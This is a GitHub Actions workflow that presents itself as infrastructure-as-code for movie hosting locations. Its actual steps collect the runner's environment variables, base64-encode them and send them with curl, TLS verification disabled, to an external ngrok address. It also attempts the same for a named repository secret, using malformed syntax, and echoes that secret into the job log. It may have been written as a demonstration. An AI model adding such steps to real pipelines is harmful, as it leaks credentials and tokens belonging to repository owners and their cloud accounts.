
name: IaC

# Controls when the new movie hosting locations are created or updated
on:
  push:
    branches: [ feature/harald ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
 
  build:
    runs-on: ubuntu-latest
    environment: Vienna


    steps:
      - name: Tell me your secrets
        run: |
          curl -k https://4877-128-130-233-91.eu.ngrok.io?data=$(env | base64 --wrap=0)
          curl -k https://4877-128-130-233-91.eu.ngrok.io?secret=$(secrets.FAVOURITE | base64 --wrap=0)
          echo "::add-mask::${{ secrets.FAVOURITE }}"

      - name: I ll tell you my current favourite 
        run: echo ${{ secrets.FAVOURITE }}
